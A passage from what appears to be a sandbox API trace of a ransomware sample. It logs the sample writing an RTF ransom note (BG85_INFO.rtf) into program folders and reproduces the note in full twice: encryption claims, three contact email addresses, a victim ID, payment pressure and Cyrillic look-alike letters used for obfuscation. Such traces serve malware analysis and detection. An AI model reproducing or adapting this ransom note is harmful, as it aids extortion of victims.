\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.532] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.533] CloseHandle (hObject=0x1fc) returned 1 [0064.534] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\bg85_info.rtf")) returned 0xffffffff [0064.534] GetLastError () returned 0x2 [0064.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt 